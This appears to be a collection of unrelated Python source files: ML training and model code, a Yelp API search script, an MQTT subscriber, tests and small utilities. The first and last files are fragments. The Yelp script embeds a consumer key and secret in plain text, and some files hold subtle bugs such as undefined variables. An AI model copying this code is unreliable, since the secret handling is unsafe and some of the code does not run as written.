def __init__(self, base_model: nn.Module, n_scales=3):
super().__init__()
self.scales = nn.ModuleList()
self.scales.append(base_model)
for i in range(n_scales - 1):
self.scales.append(copy.deepcopy(base_model))
def forward(self, x: torch.Tensor, flatten=True) -> List[torch.Tensor]:
N = x.shape[0]
outs = []
for i in range(len(self.scales)):
scale = 2**i
out = self.scales[i](nn.functional.interpolate(
x, scale_factor=1 / scale, mode='bilinear')).view(N, -1)
outs.append(out.view(N, -1))
if flatten:
return torch.cat(outs, dim=1)
else:
return outs
|
485639
|
import json
import requests
from requests_oauthlib import OAuth1
consumer_key= 'NZTJrWhij8kemtAXmfyhyA'
consumer_secret = 'JtcAesDkKuNltcKdwR7NEaUkgm8'
token = '<KEY>'
token_secret = '<KEY>'
url ='https://api.yelp.com/v2/search?term=food&location=San+Francisco'
r = requests.get(url, auth=auth)
def do_search(term='Food', location='San Francisco'):
base_url = 'https://api.yelp.com/v2/search'
term = term.replace(' ', '+')
location = location.replace(' ', '+')
url = "{base_url}?term={term}&location={location}".format(base_url=base_url,
term=term,
location=location)
auth = OAuth1(consumer_key,
consumer_secret,
token,
token_secret)
r = requests.get(url, auth=auth)
return r.json(), r.text
json_data, text_data = do_search()
python_data = json.loads(text_data)
print(json.dumps(json_data, indent=4, sort_keys=True))
for i in json_data['businesses']:
print(i["name"])
print(i["phone"])
print(i["location"]["display_address"])
print(i["location"]["city"])
|
485755
|
import keras
from utils.load_cifar import load_data
from keras.preprocessing.image import ImageDataGenerator
from models import resnet, VGGnet
from utils.schedules import onetenth_60_120_160
from utils.channel_pruning import freeze_SR_layer, set_compact_model_weights
import argparse
import os
import matplotlib
matplotlib.use('AGG')
import matplotlib.pyplot as plt
def plot_history(history, result_dir, prefix):
plt.plot(history.history['acc'], marker='.')
plt.plot(history.history['val_acc'], marker='.')
plt.title('model accuracy')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.grid()
plt.legend(['acc', 'val_acc'], loc='lower right')
plt.savefig(os.path.join(result_dir, '{}_accuracy.png'.format(prefix)))
plt.close()
plt.plot(history.history['loss'], marker='.')
plt.plot(history.history['val_loss'], marker='.')
plt.title('model loss')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.grid()
plt.legend(['loss', 'val_loss'], loc='upper right')
plt.savefig(os.path.join(result_dir, '{}_loss.png'.format(prefix)))
plt.close()
def save_history(history, result_dir, prefix):
loss = history.history['loss']
acc = history.history['acc']
val_loss = history.history['val_loss']
val_acc = history.history['val_acc']
nb_epoch = len(acc)
with open(os.path.join(result_dir, '{}_result.txt'.format(prefix)), 'w') as fp:
fp.write('epoch\tloss\tacc\tval_loss\tval_acc\n')
for i in range(nb_epoch):
fp.write('{}\t{}\t{}\t{}\t{}\n'.format(
i, loss[i], acc[i], val_loss[i], val_acc[i]))
def training():
batch_size = 64
epochs = 200
fine_tune_epochs = 50
lr = 0.1
x_train, y_train, x_test, y_test, nb_classes = load_data(args.data)
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
y_train = keras.utils.to_categorical(y_train, nb_classes)
y_test = keras.utils.to_categorical(y_test, nb_classes)
datagen = ImageDataGenerator(horizontal_flip=True,
width_shift_range=5. / 32,
height_shift_range=5. / 32)
data_iter = datagen.flow(x_train, y_train, batch_size=batch_size, shuffle=True)
if args.model == 'resnet':
model = resnet.resnet(nb_classes,
depth=args.depth,
wide_factor=args.wide_factor,
sparse_factor=args.sparse_factor)
save_name = 'resnet_{}_{}_{}'.format(args.depth, args.wide_factor, args.data)
else:
model = VGGnet.vgg(nb_classes, sparse_factor=args.sparse_factor)
save_name = 'VGGnet_{}'.format(args.data)
opt = keras.optimizers.SGD(lr=lr, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
model.summary()
history = model.fit_generator(data_iter,
steps_per_epoch=x_train.shape[0] // batch_size,
epochs=epochs,
callbacks=[onetenth_60_120_160(lr)],
validation_data=(x_test, y_test))
if not os.path.exists('./results/'):
os.mkdir('./results/')
plot_history(history, './results/', save_name)
save_history(history, './results/', save_name)
model.save_weights('./results/{}_weights.h5'.format(save_name))
freeze_SR_layer(model, args.prune_rate)
# todo: a little change
opt = keras.optimizers.SGD(lr=0.0001, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
model.save_weights('./results/{}_{}_weights.h5'.format(save_name, 'fine_tuned'))
model.fit_generator(data_iter,
steps_per_epoch=x_train.shape[0] // batch_size,
epochs=fine_tune_epochs,
validation_data=(x_test, y_test))
# create compact model
if args.model == 'resnet':
model = resnet.resnet(nb_classes,
depth=args.depth,
wide_factor=args.wide_factor,
sparse_factor=args.sparse_factor, prune_rate=args.prune_rate)
else:
model = VGGnet.vgg(nb_classes, sparse_factor=args.sparse_factor, prune_rate=args.prune_rate)
compact_model.summary()
set_compact_model_weights(model, compact_model)
opt = keras.optimizers.SGD(lr=0.0001, momentum=0.9, nesterov=True)
compact_model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
score = compact_model.evaluate(x_test, y_test, verbose=0)
print('loss: {}'.format(score[0]))
print('acc: {}'.format(score[1]))
compact_model.save_weights('./results/{}_{}_weights.h5'.format(save_name, 'channel_pruned'))
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('--data', type=str, default='c10', help='Supports c10 (CIFAR-10) and c100 (CIFAR-100)')
parse.add_argument('--model', type=str, default='vgg')
parse.add_argument('--depth', type=int, default=40)
parse.add_argument('--growth-rate', type=int, default=12)
parse.add_argument('--wide-factor', type=int, default=1)
parse.add_argument('--sparse-factor', type=int, default=1e-5)
parse.add_argument('--prune-rate', type=int, default=0.75)
args = parse.parse_args()
if args.data not in ['c10', 'c100']:
raise Exception('args.data must be c10 or c100!')
training()
|
485762
|
import mosquitto
import os
client = mosquitto.Mosquitto('Subscriber-%s' % os.getpid())
def on_connect(mosq, obj, rc):
if rc == 0:
print('Connected')
else:
print('Connection Error')
client.on_connect = on_connect
def on_message(mosq, obj, msg):
print('Topic: %s' % msg.topic)
print('QoS: %s' % msg.qos)
print('Retain: %s' % msg.retain)
print('Payload: %s' % msg.payload)
client.unsubscribe('mqtt/example')
client.on_message = on_message
def on_unsubscribe(mosq, obj, mid):
print("Unsubscribe with mid %s received." % mid)
client.disconnect()
client.on_unsubscribe = on_unsubscribe
client.connect("127.0.0.1")
client.subscribe("mqtt/example", 0)
while client.loop(timeout=1) == 0:
pass
|
485834
|
import os
import time
import argparse
import numpy as np
import torch
import open3d as o3d
from fusion import TSDFVolumeTorch
from dataset.tum_rgbd import TUMDataset
from tracker import ICPTracker
from utils import load_config, get_volume_setting, get_time
vis_param = argparse.Namespace()
vis_param.frame_id = 0
vis_param.current_mesh = None
vis_param.current_camera = None
vis_param.curr_pose = None
def refresh(vis):
if vis:
# This spares slots for meshing thread to emit commands.
time.sleep(0.01)
if vis_param.frame_id == vis_param.n_frames:
return False
sample = vis_param.dataset[vis_param.frame_id]
color0, depth0, pose_gt, K = sample # use live image as template image (0)
# depth0[depth0 <= 0.5] = 0.
if vis_param.frame_id == 0:
vis_param.curr_pose = pose_gt
else:
# render depth image (1) from tsdf volume
depth1, color1, vertex01, normal1, mask1 = \
vis_param.map.render_model(vis_param.curr_pose, K, vis_param.H, vis_param.W,
near=args.near, far=vis_param.args.far, n_samples=vis_param.args.n_steps)
T10 = vis_param.tracker(depth0, depth1, K) # transform from 0 to 1
vis_param.curr_pose = vis_param.curr_pose @ T10
# update view-point
if vis_param.args.follow_camera:
follow_camera(vis, vis_param.curr_pose.cpu().numpy())
# fusion
vis_param.map.integrate(depth0, K, vis_param.curr_pose, obs_weight=1., color_img=color0)
# update mesh
mesh = vis_param.map.to_o3d_mesh()
if vis_param.current_mesh is not None:
vis.remove_geometry(vis_param.current_mesh, reset_bounding_box=False)
vis.add_geometry(mesh, reset_bounding_box=False)
vis_param.current_mesh = mesh
# update camera
camera = draw_camera(vis_param.curr_pose.cpu().numpy())
if vis_param.current_camera is not None:
vis.remove_geometry(vis_param.current_camera, reset_bounding_box=False)
vis.add_geometry(camera, reset_bounding_box=False)
vis_param.current_camera = camera
vis_param.frame_id += 1
return True
def draw_camera(c2w, cam_width=0.2, cam_height=0.15, f=0.1):
points = [[0, 0, 0], [-cam_width, -cam_height, f], [cam_width, -cam_height, f],
[cam_width, cam_height, f], [-cam_width, cam_height, f]]
lines = [[0, 1], [0, 2], [0, 3], [0, 4], [1, 2], [2, 3], [3, 4], [4, 1]]
colors = [[1, 0, 1] for i in range(len(lines))]
line_set = o3d.geometry.LineSet()
line_set.points = o3d.utility.Vector3dVector(points)
line_set.lines = o3d.utility.Vector2iVector(lines)
line_set.colors = o3d.utility.Vector3dVector(colors)
line_set.transform(c2w)
return line_set
def follow_camera(vis, c2w, z_offset=-2):
"""
:param vis: visualizer handle
:param c2w: world to camera transform Twc
:param z_offset: offset along z-direction of eye wrt camera
:return:
"""
e2c = np.eye(4)
e2c[2, 3] = z_offset
e2w = c2w @ e2c
set_view(vis, np.linalg.inv(e2w))
def set_view(vis, w2e=np.eye(4)):
"""
:param vis: visualizer handle
:param w2e: world-to-eye transform
:return:
"""
vis_ctl = vis.get_view_control()
cam = vis_ctl.convert_to_pinhole_camera_parameters()
# world to eye w2e
cam.extrinsic = w2e
vis_ctl.convert_from_pinhole_camera_parameters(cam)
def get_view(vis):
vis_ctl = vis.get_view_control()
cam = vis_ctl.convert_to_pinhole_camera_parameters()
print(cam.extrinsic)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default="configs/fr1_desk.yaml", help="Path to config file.")
parser.add_argument("--follow_camera", action="store_true", help="Make view-point follow the camera motion")
args = load_config(parser.parse_args())
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
dataset = TUMDataset(os.path.join(args.data_root), device, near=args.near, far=args.far, img_scale=0.25)
vol_dims, vol_origin, voxel_size = get_volume_setting(args)
vis_param.args = args
vis_param.dataset = dataset
vis_param.map = TSDFVolumeTorch(vol_dims, vol_origin, voxel_size, device, margin=3, fuse_color=True)
vis_param.tracker = ICPTracker(args, device)
vis_param.n_frames = len(dataset)
vis_param.H = dataset.H
vis_param.W = dataset.W
# visualize
vis = o3d.visualization.VisualizerWithKeyCallback()
vis.create_window(width=1280, height=960)
# vis.get_view_control().unset_constant_z_near()
# vis.get_view_control().unset_constant_z_far()
vis.get_render_option().mesh_show_back_face = True
vis.register_animation_callback(callback_func=refresh)
coord_axes = o3d.geometry.TriangleMesh.create_coordinate_frame()
vis.add_geometry(coord_axes)
vis.remove_geometry(coord_axes, reset_bounding_box=False)
# set initial view-point
c2w0 = dataset[0][2]
follow_camera(vis, c2w0.cpu().numpy())
# start reconstruction and visualization
vis.run()
vis.destroy_window()
|
485846
|
import dominate
from dominate.tags import *
import os
import numpy as np
import ntpath
import time
import glob
import sys
import pdb
# define HTML class
class HTML:
def __init__(self, title, reflesh=0):
self.title = title
self.doc = dominate.document(title=title)
if reflesh > 0:
with self.doc.head:
meta(http_equiv="reflesh", content=str(reflesh))
def add_header(self, str):
with self.doc:
h3(str)
def add_table(self, border=1):
self.t = table(border=border, style="table-layout: fixed;")
self.doc.add(self.t)
def add_images(self, ims, txts, width=400):
self.add_table()
with self.t:
with tr():
for im, txt in zip(ims, txts):
with td(style="word-wrap: break-word;", halign="center", valign="top"):
with p():
with a(href=im):
img(style="width:%dpx" % width, src=im)
br()
p(txt)
def save(self):
html_file = '%s.html' % self.title
f = open(html_file, 'wt')
f.write(self.doc.render())
f.close()
def main():
# name = 'disentangled_shuffle_resnet_9blocks_sigmoid_A100_TV1_lr0.0002'
name = sys.argv[1]
root = '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/'
web_name = 'Dehaze_'+name
suffix = ['_Hazy', '_dcp_radiance-refinedt', '_DehazeNet', '_fake_B', '_Haze-free', '_Haze-free-depth', '_real_B']
# folder = ['/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# 'DCP/'+name+'/',
# 'DehazeNet/'+name+'/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/']
folder = ['/static/'+name+'/images/',
'/static/DCP/',
'/static/DehazeNet/',
'/static/cyclegan/',
'/static/'+name+'/images/',
'/static/'+name+'/images/',
'/static/'+name+'/images/']
assert len(suffix) == len(folder)
img_names = glob.glob(root+'/*_Hazy_Hazy.png')
max_num = 100
win_size = 256
# create website
webpage = HTML(web_name)
for i, img_name in enumerate(img_names):
if i >= max_num:
break
img_name = os.path.basename(img_name)
img_path = []
for j in range(len(suffix)):
img_path.append(os.path.join(folder[j], img_name.replace('_Hazy.png', suffix[j]+'.png')))
webpage.add_header(img_name)
webpage.add_images(img_path, suffix, win_size)
webpage.save()
##################### Page 2####################
web_name = 'Transmission_'+name
suffix = ['_Hazy', '_dcp_refinedt', '_transmition', '_Estimate_depth', '_real_depth']
# folder = ['/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/Downloads/GAN/DCP/'+name+'/',
# '/home/xyang/Downloads/GAN/DehazeNet/'+name+'/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/']
folder = ['/static/'+name+'/images/',
'/static/DCP/',
'/static/DehazeNet/',
'/static/'+name+'/images/',
'/static/'+name+'/images/']
assert len(suffix) == len(folder)
img_names = glob.glob(root+'/*_Hazy_Hazy.png')
max_num = 100
win_size = 256
# create website
webpage = HTML(web_name)
for i, img_name in enumerate(img_names):
if i >= max_num:
break
img_name = os.path.basename(img_name)
img_path = []
for j in range(len(suffix)):
img_path.append(os.path.join(folder[j], img_name.replace('_Hazy.png', suffix[j]+'.png')))
webpage.add_header(img_name)
webpage.add_images(img_path, suffix, win_size)
webpage.save()
if __name__ == '__main__':
main()
|
485880
|
import json
from api_client import parser, client, content, permission
from util import pretty_print, read_json_file
parser.add_argument('path', type=str, help="Path to content")
parser.add_argument('action', type=str, help="Get, add, or remove permissions",
choices=['get', 'add', 'remove'])
parser.add_argument('--data_file', '-d', type=str,
help="File to read permission from when adding or removing permissions")
args = parser.parse_args()
api_client = client.ApiClient(args.access_id, args.access_key, args.endpoint)
content_api = content.ContentManagementApi(api_client)
permissions_api = permission.ContentPermissionApi(api_client)
content_id = content_api.find_id_by_path(args.path)
if args.action == 'get':
permissions = permissions_api.get_permissions(content_id)
pretty_print(permissions['explicitPermissions'])
else:
permissions = read_json_file(args.data_file)
body = {
'contentPermissionAssignments': permissions,
'notifyRecipients': False,
'notificationMessage': ""
}
if args.action == 'add':
permissions_api.add_permissions(content_id, body)
elif args.action == 'remove':
permissions_api.remove_permissions(content_id, body)
|
485904
|
from typing import Tuple, Dict
import numpy as np
import tensorflow as tf
from tensorflow import Tensor
from decompose.distributions.algorithms import Algorithms
class LaplaceAlgorithms(Algorithms):
@classmethod
def sample(cls, parameters: Dict[str, Tensor], nSamples: Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
r = norm.sample(sample_shape=(nSamples,))
print("r in sample", r)
return(r)
@classmethod
def mode(cls, parameters: Dict[str, Tensor]) -> Tensor:
mu = parameters["mu"]
return(mu)
@classmethod
def pdf(cls, parameters: Dict[str, Tensor], data: Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
pdf = norm.prob(value=data)
return(pdf)
@classmethod
def fit(cls, parameters: Dict[str, Tensor],
data: tf.Tensor) -> Dict[str, Tensor]:
M = data.get_shape().as_list()[0]
mu = tf.contrib.nn.nth_element(tf.transpose(data), M//2)
beta = tf.reduce_mean(tf.abs(data-mu), axis=0)
updatedParameters = {"mu": mu, "beta": beta}
return(updatedParameters)
@classmethod
def llh(cls, parameters: Dict[str, Tensor], data: tf.Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
llh = norm.log_prob(value=data)
return(llh)
@classmethod
def fitLatents(cls, parameters: Dict[str, Tensor],
data: Tensor) -> Dict[str, Tensor]:
return({})
|
486046
|
import unittest
import numpy as np
import PySeismoSoil.helper_generic as hlp
import os
from os.path import join as _join
f_dir = _join(os.path.dirname(os.path.realpath(__file__)), 'files')
class Test_Helper_Generic(unittest.TestCase):
def test_is_int(self):
self.assertTrue(hlp.is_int(3))
self.assertTrue(hlp.is_int(np.array([3])[0]))
self.assertTrue(hlp.is_int(3.0))
self.assertTrue(hlp.is_int(np.array([3.0])[0]))
self.assertFalse(hlp.is_int(3.1))
self.assertFalse(hlp.is_int(np.array([3.1])[0]))
self.assertFalse(hlp.is_int(None))
self.assertFalse(hlp.is_int(np.array([])))
self.assertFalse(hlp.is_int(np.array([3])))
def test_read_two_column_stuff(self):
# Load from file
data, dt = hlp.read_two_column_stuff(_join(f_dir, 'two_column_data_example.txt'))
benchmark = np.array(
[[.1, .2, .3, .4, .5, .6, .7, .8, .9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5],
[1, 2, 3, 4, 5, 2, 3, 4, 5, 6, 3, 4, 5, 6, 7]]
).T
self.assertTrue(np.allclose(data, benchmark))
self.assertAlmostEqual(dt, benchmark[1, 0] - benchmark[0, 0])
# Load from 1D numpy array
data_1col = np.array([1, 2, 3, 4, 5, 2, 3, 4, 5, 6, 3, 4, 5, 6, 7])
dt = 0.1
data_, dt_ = hlp.read_two_column_stuff(data, dt)
self.assertTrue(np.allclose(data_1col, data_[:, 1]))
self.assertAlmostEqual(dt, dt_)
# Load from 2D numpy array
data__, dt__ = hlp.read_two_column_stuff(
benchmark, benchmark[1, 0] - benchmark[0, 0],
)
self.assertTrue(np.allclose(data__, benchmark))
self.assertAlmostEqual(dt__, benchmark[1, 0] - benchmark[0, 0])
def test_check_two_column_format(self):
with self.assertRaisesRegex(TypeError, '1.5 should be a numpy array.'):
hlp.check_two_column_format(1.5, '1.5')
with self.assertRaisesRegex(TypeError, '_a_ should be a 2D numpy array.'):
hlp.check_two_column_format(np.array([1, 2, 3]), '_a_')
with self.assertRaisesRegex(TypeError, '_b_ should have two columns.'):
hlp.check_two_column_format(np.ones((2, 3)), '_b_')
def test_find_closest_index(self):
array = [1, 2, 3]
value = 3
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.find_closest_index(array, value)
array = np.array([1])
value = 5
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [0, 1]))
array = np.array([4, 3, 2, 1, 5, 7, 9])
value = 2.2
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [2, 2]))
value = -100
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [3, 1]))
value = 100
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [6, 9]))
def test_mean_absolute_error(self):
y_true = np.array([1, 2, 3, 4, 5])
y_pred = np.array([1.32, 2.12, 2.87, 3.95, 5.74])
self.assertAlmostEqual(hlp.mean_absolute_error(y_true, y_pred), 0.272)
def test_check_numbers_valid(self):
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, 3])), 0)
self.assertEqual(hlp.check_numbers_valid(np.array(['a', 'b'])), -1)
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, np.nan])), -2)
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, -1])), -3)
def test_assert_1D_numpy_array(self):
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array([1, 2, 3, 4])
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array(np.array([[1, 2, 3, 4]]))
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array(np.array([[1, 2], [3, 4]]))
def test_assert_array_length(self):
# Case #1: not an array
thing = None
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.assert_array_length(thing, name='`thing`', length=None)
# Case #2: 1D numpy array, length check successful
thing = np.array([1, 2, 3])
hlp.assert_array_length(thing, length=3) # running without exception
# Case #3: 1D numpy array, length check failed
thing = np.array([1, 2, 3])
with self.assertRaisesRegex(ValueError, 'have length 4, but not 3'):
hlp.assert_array_length(thing, length=4)
def test_extend_scalar(self):
# Case #1: not a single number
with self.assertRaisesRegex(TypeError, 'must be a float, int'):
hlp.extend_scalar(np.ones(3), 2)
# Case #2: `length` is something strange
self.assertTrue(np.allclose(hlp.extend_scalar(2.5, None), np.array(2.5)))
# Case #3: `length` is an integer
self.assertTrue(np.allclose(
hlp.extend_scalar(2.5, 3), np.array([2.5, 2.5, 2.5]),
))
# Case #4: `length` is not an integer
with self.assertRaisesRegex(TypeError, "cannot be interpreted as an integer"):
hlp.extend_scalar(2.5, 3.5)
def test_check_length_or_extend_to_array(self):
# Case #1: a 2D numpy array -- error
a = np.array([[1, 2], [3, 4]])
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.check_length_or_extend_to_array(a, 3)
# Case #2: a 1D numpy array with correct length
hlp.check_length_or_extend_to_array(np.array([1, 2, 3]), 3)
# Case #3: a 1D numpy array with incorrect length
with self.assertRaisesRegex(ValueError, 'have length 6, but not 3'):
hlp.check_length_or_extend_to_array(np.array([1, 2, 3]), 6)
# Case #4: a single value
array_bench = np.array([3.4, 3.4, 3.4, 3.4, 3.4])
array = hlp.check_length_or_extend_to_array(3.4, 5)
self.assertTrue(np.allclose(array, array_bench))
# Case #5: other data types
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.check_length_or_extend_to_array(None, 3)
def test_extract_from_curve_format(self):
data = np.genfromtxt(_join(f_dir, 'curve_FKSH14.txt'))[:, :8]
GGmax, damping = hlp.extract_from_curve_format(data)
strain = [0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3]
GGmax_1 = [
0.99038, 0.97403, 0.92539, 0.8188, 0.59912, 0.35256,
0.15261, 0.061578, 0.021241, 0.0078452,
]
GGmax_2 = [
0.99452, 0.98511, 0.95629, 0.88852, 0.72498, 0.48992,
0.24108, 0.10373, 0.036868, 0.013755,
]
damping_1 = [
1.6683, 1.8386, 2.4095, 3.8574, 7.4976, 12.686, 18.102,
21.005, 21.783, 21.052,
]
damping_2 = [
0.99457, 1.0872, 1.4039, 2.2497, 4.6738, 9.0012, 14.898,
19.02, 21.021, 20.947,
]
GGmax_bench = [
np.column_stack((strain, GGmax_1)),
np.column_stack((strain, GGmax_2)),
]
damping_bench = [
np.column_stack((strain, damping_1)),
np.column_stack((strain, damping_2)),
]
self.assertTrue(np.allclose(GGmax, GGmax_bench))
self.assertTrue(np.allclose(damping, damping_bench))
def test_extract_from_param_format(self):
data = np.genfromtxt(_join(f_dir, 'HH_X_FKSH14.txt'))
param = hlp.extract_from_param_format(data)
param_bench = [
np.array([0.010161, 1, 0.10468, 39.317, 0.630114, 18.7975, 149.535, 29.053, 1]),
np.array([0.027916, 1.01507, 0.0851825, 23.468, 0.638322, 5.84163, 183.507, 29.7071, 1]),
np.array([0.0479335, 1.00849, 0.276801, 35.9504, 0.643012, 5.04279, 193.483, 54.8234, 1]),
np.array([0.0516179, 1.0215, 0.153973, 21.8676, 0.654707, 1.44752, 179.24, 22.4495, 1]),
np.array([0.0340815, 1.02711, 0.202054, 25.2326, 0.667001, 3.97622, 195.136, 34.601, 1]),
]
self.assertTrue(np.allclose(param, param_bench))
def test_merge_curve_matrices(self):
m1 = np.array(
[[1, 2, 3],
[-1, -2, -3],
[1, 2, 3],
[-2, -3, -4],
[1, 2, 3],
[-3, -4, -5],
[1, 2, 3],
[-4, -5, -6]]
).T
m2 = np.array(
[[1, 2, 3],
[10, 20, 30],
[1, 2, 3],
[20, 30, 40],
[1, 2, 3],
[30, 40, 50],
[1, 2, 3],
[40, 50, 60]]
).T
benchmark = np.array(
[[1, 2, 3],
[-1, -2, -3],
[1, 2, 3],
[20, 30, 40],
[1, 2, 3],
[-3, -4, -5],
[1, 2, 3],
[40, 50, 60]]
).T
result = hlp.merge_curve_matrices(m1, m2)
self.assertTrue(np.allclose(result, benchmark))
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(Test_Helper_Generic)
unittest.TextTestRunner(verbosity=2).run(SUITE)
|
486058
|
from pydantic import BaseModel
from .mixin import YamlModelMixin
_pre_doc = """`pydantic.BaseModel` class with built-in YAML support.
You can alternatively inherit from this to implement your model:
`(pydantic_yaml.YamlModelMixin, pydantic.BaseModel)`
See Also
--------
pydantic-yaml: https://github.com/NowanIlfideme/pydantic-yaml
pydantic: https://pydantic-docs.helpmanual.io/
pyyaml: https://pyyaml.org/
ruamel.yaml: https://yaml.readthedocs.io/en/latest/index.html
"""
class YamlModel(YamlModelMixin, BaseModel):
__doc__ = _pre_doc + BaseModel.__doc__
|
486071
|
import bleach
from markdown import markdown
from typing import Any, List, Iterable
from django.contrib.auth.models import Permission
from django.utils.text import SafeText
def get_permissions_from_ns_codenames(ns_codenames):
'''
Returns a list of Permission objects for the specified namespaced codenames
'''
splitnames = [ns_codename.split('.') for ns_codename in ns_codenames]
return [
Permission.objects.get(codename=codename,
content_type__app_label=app_label)
for app_label, codename in splitnames
]
def unbroken_hyphenize(text: str) -> str:
'''
Replace all hyphens with non-breaking hyphens.
>>> unbroken_hyphenize('874‑1, 874‑2')
'874\u20111, 874\u20112'
'''
return text.replace('-', '\u2011')
def backtickify(items: Iterable[Any]) -> List[str]:
'''
Wrap all list items in backticks, e.g.:
>>> backtickify(['a', 'b'])
['`a`', '`b`']
'''
return list(map(lambda s: f"`{s}`", items))
def humanlist(items: Iterable[str], word: str='and') -> str:
'''
Convert the given list to a comma-separated human-readable
string, separating the final item with the given word.
As per the 18F Content Guide, we use the Oxford comma.
Examples:
>>> humanlist(['a', 'b', 'c'])
'a, b, and c'
>>> humanlist(['a', 'b', 'c'], 'or')
'a, b, or c'
>>> humanlist(['a'])
'a'
'''
itemlist = list(items)
if len(itemlist) < 2:
return ''.join(items)
return ', '.join(itemlist[:-1]) + f', {word} ' + itemlist[-1]
def markdown_to_sanitized_html(text: str) -> SafeText:
'''
Render the given untrusted Markdown to sanitized HTML.
Examples:
>>> markdown_to_sanitized_html('hello **there** *u*')
'<p>hello <strong>there</strong> <em>u</em></p>'
>>> markdown_to_sanitized_html('<script>meh</script>')
'<script>meh</script>'
'''
return SafeText(bleach.clean(
markdown(text),
tags=['p', 'strong', 'em']
))
|
486087
|
import os
import tensorflow as tf
from components import metrics
from components.feature_extractor import feature_extractor
from components.semantic_segmentation import SemanticSegmentationModel
from components.instance_segmentation import InstanceSegmentationModel
from components.panoptic_ops import merge_to_panoptic
from utils import summaries
class PanopticSegmentationModel(object):
def __init__(self, images, labels, params, instance_gt=None):
self.params = params
self.images = images
self.labels = labels
self.instance_gt = instance_gt
self.semantic_segmentation = SemanticSegmentationModel(self.params)
self.instance_segmentation = InstanceSegmentationModel(self.params, is_training=params.is_training)
self.apply_semantic_branch = params.apply_semantic_branch
self.apply_instance_branch = params.apply_instance_branch
self.groundtruth_dict = None
if self.params.is_training:
self.prepare_gt()
def predict(self):
features, _ = feature_extractor(None, self.images, self.params)
prediction_dict = dict()
if self.apply_semantic_branch:
logits = self.semantic_segmentation.predict(features)
prediction_dict['logits'] = logits
if self.apply_instance_branch:
prediction_dict.update(self.instance_segmentation.predict(features, prediction_dict, self.groundtruth_dict))
return prediction_dict
def postprocess(self, prediction_dict):
if self.apply_semantic_branch:
probs, predictions = self.semantic_segmentation.postprocess(prediction_dict['logits'])
prediction_dict['semantic'] = predictions
prediction_dict['semantic_probs'] = probs
if self.apply_instance_branch:
prediction_dict = self.instance_segmentation.postprocess(prediction_dict)
if self.apply_semantic_branch and self.apply_instance_branch:
prediction_dict = merge_to_panoptic(prediction_dict, self.params)
return prediction_dict
def loss(self, prediction_dict, save_image_summaries=True, save_eval_summaries=True):
with tf.variable_scope("GetRegularization"):
l2_regularizer = tf.contrib.layers.l2_regularizer(self.params.regularization_weight)
reg_vars = [v for v in tf.trainable_variables() if 'weights' in v.name]
reg_loss = tf.contrib.layers.apply_regularization(l2_regularizer, reg_vars)
tf.summary.scalar('regularization', reg_loss, family='losses')
losses_dict = dict()
if self.apply_semantic_branch:
logits = prediction_dict['logits']
labels, weights = self.semantic_segmentation.format_gt(self.labels)
sem_loss = self.semantic_segmentation.loss(logits=logits, labels=labels, weights=weights)
losses_dict['semantic'] = sem_loss
if save_image_summaries:
summaries.image_summaries(self.images, labels, logits, weights, self.params)
if save_eval_summaries:
with tf.variable_scope('miou_training'):
predictions = tf.nn.softmax(logits)
predictions = tf.argmax(predictions, axis=-1)
labels = tf.reshape(labels, [-1])
predictions = tf.reshape(predictions, [-1])
weights = tf.reshape(weights, [-1])
total_cm = tf.confusion_matrix(labels=labels,
predictions=predictions,
num_classes=self.params.num_classes,
weights=weights)
miou = metrics.compute_mean_iou(total_cm)
tf.summary.scalar('mIoU', tf.cast(miou, tf.float32), family='metrics')
if self.apply_instance_branch:
loss_dict = self.instance_segmentation.loss(prediction_dict, self.groundtruth_dict)
losses_dict.update(loss_dict)
if save_image_summaries:
prediction_dict = self.instance_segmentation.postprocess(prediction_dict)
self.gt_boxes = self.instance_gt['boxes']
self.gt_num_boxes = self.instance_gt['num_boxes']
